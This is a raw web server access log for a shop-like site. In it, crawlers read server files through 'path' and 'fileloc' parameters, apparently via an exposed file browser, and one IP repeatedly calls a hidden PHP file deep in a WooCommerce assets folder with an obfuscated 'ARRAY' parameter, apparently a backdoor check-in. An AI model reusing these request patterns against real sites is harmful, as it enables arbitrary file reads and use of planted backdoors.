74.7.241.10 - - [02/Aug/2026:02:13:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory2 HTTP/1.1" 200 3545 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory3/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:10 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-16%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-16 HTTP/1.1" 200 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory1 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:13 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fftp&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 72192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:16 +0200] "GET /?fileloc=%2F%2Fbin%2Fgit-receive-pack&path=%2F%2Fbin HTTP/1.1" 200 1731170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:02:13:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory0/subsystem/devices/memory1 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory0/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:11:01 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333036312p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393436312q3966386133343630326662633338336263336338306136616266646339363333222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:13:22 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fps&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 47333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:23 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory1/subsystem/devices/memory2 HTTP/1.1" 200 3545 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory1/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:25 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdmaengine-unmap-256%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdmaengine-unmap-256 HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:26 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem/devices/memory9 HTTP/1.1" 200 3551 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:28 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fhead&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 16975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory0/subsystem/devices/memory1 HTTP/1.1" 200 3551 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory0/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:32 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2FPINGv6%2Fpartial&path=%2F%2Fsys%2Fkernel%2Fslab%2FPINGv6 HTTP/1.1" 200 2730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9 HTTP/1.1" 200 3549 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:34 +0200] "GET /?fileloc=%2F%2Fproc%2Fzoneinfo&path=%2F%2Fproc HTTP/1.1" 200 3903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory6/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:37 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fapport-bug&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:39 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9/removable&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9 HTTP/1.1" 200 2826 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:40 +0200] "GET /?fileloc=%2F%2Fbin%2Fkmod&path=%2F%2Fbin HTTP/1.1" 200 70299 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:43 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fgrep&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 75144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:11:23 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333038332p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393438332q3735306135336239313630356238343164646363396665366166333738353865222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:13:45 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory1/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory4/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:46 +0200] "GET /?fileloc=%2F%2Fusr%2Finclude%2Fx86_64-linux-gnu%2Fasm%2Fsignal.h&path=%2F%2Fusr%2Finclude%2Fx86_64-linux-gnu%2Fasm HTTP/1.1" 200 3583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:48 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory8 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:49 +0200] "GET /?fileloc=%2F%2Fbin%2Fdf&path=%2F%2Fbin HTTP/1.1" 200 34509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:53 +0200] "GET /?fileloc=%2F%2Fopt%2Fphp70%2Fetc%2Fpear.conf&path=%2F%2Fopt%2Fphp70%2Fetc HTTP/1.1" 200 3180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory56/subsystem/devices HTTP/1.1" 200 4938 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory56/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:55 +0200] "GET /?fileloc=%2Fvar%2Flog%2Fnginx%2Ferror.log&path=%2Fvar%2Flog%2Fnginx HTTP/1.1" 200 2715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:13:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/devices/memory8 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:13:58 +0200] "GET /?fileloc=%2F%2Fbin%2Fsg_read&path=%2F%2Fbin HTTP/1.1" 200 11208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory2 HTTP/1.1" 200 3546 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:02 +0200] "GET /?fileloc=%2F%2Fsys%2Fmodule%2Fpolyval_generic%2Fholders%2Fpolyval_clmulni%2Fsrcversion&path=%2F%2Fsys%2Fmodule%2Fpolyval_generic%2Fholders%2Fpolyval_clmulni HTTP/1.1" 200 2772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:04 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory6/subsystem/devices/memory8 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory6/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:05 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fscsi_sense_cache%2Fslabs&path=%2F%2Fsys%2Fkernel%2Fslab%2Fscsi_sense_cache HTTP/1.1" 200 2731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:14:06 +0200] "GET / HTTP/1.1" 200 4506 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
94.136.190.175 - - [02/Aug/2026:02:11:45 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333130352p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393530352q3631393334383834303134663365373063663461393666353233633039643261222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:14:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory7 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:08 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fnsec3hash&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 6328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:02:14:11 +0200] "GET /?fileloc=%2F%2Fsbin%2Fcapable-bpfcc&path=%2F%2Fsbin HTTP/1.1" 200 5750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory0 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:14 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fapt-config&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 11462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory6 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:17 +0200] "GET /?fileloc=%2F%2Fbin%2Fbtrfstune&path=%2F%2Fbin HTTP/1.1" 200 253075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory9 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:20 +0200] "GET /?fileloc=%2F%2Fbin%2Fsdiff&path=%2F%2Fbin HTTP/1.1" 200 19476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory6 HTTP/1.1" 200 3551 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:23 +0200] "GET /?fileloc=%2F%2Fsbin%2Fmdflush.bt&path=%2F%2Fsbin HTTP/1.1" 200 3174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:23 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory8/online&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory8 HTTP/1.1" 200 2825 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices/memory8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:26 +0200] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fsg_zone&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 7041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:26 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3/uevent&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3 HTTP/1.1" 200 2824 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:29 +0200] "GET /?fileloc=%2F%2Fproc%2F35%2Fmaps&path=%2F%2Fproc%2F35 HTTP/1.1" 200 2703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:02:12:08 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633333132382p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632393532382q6138353137313035613962376662633632646432313638316333656330666163222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:14:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3/power HTTP/1.1" 200 3516 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:32 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-128%2Fremote_node_defrag_ratio&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-128 HTTP/1.1" 200 2746 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory4 HTTP/1.1" 200 3550 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:35 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fnet_namespace%2Forder&path=%2F%2Fsys%2Fkernel%2Fslab%2Fnet_namespace HTTP/1.1" 200 2729 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices/memory4 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory8/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:38 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2FUDP-Lite%2Fslabs_cpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2FUDP-Lite HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices/memory8 HTTP/1.1" 200 3548 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory9/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:14:41 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fext4_io_end%2Fcache_dma&path=%2F%2Fsys%2Fkernel%2Fslab%2Fext4_io_end HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:14:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory7/power HTTP/1.1" 200 3517 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory3/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
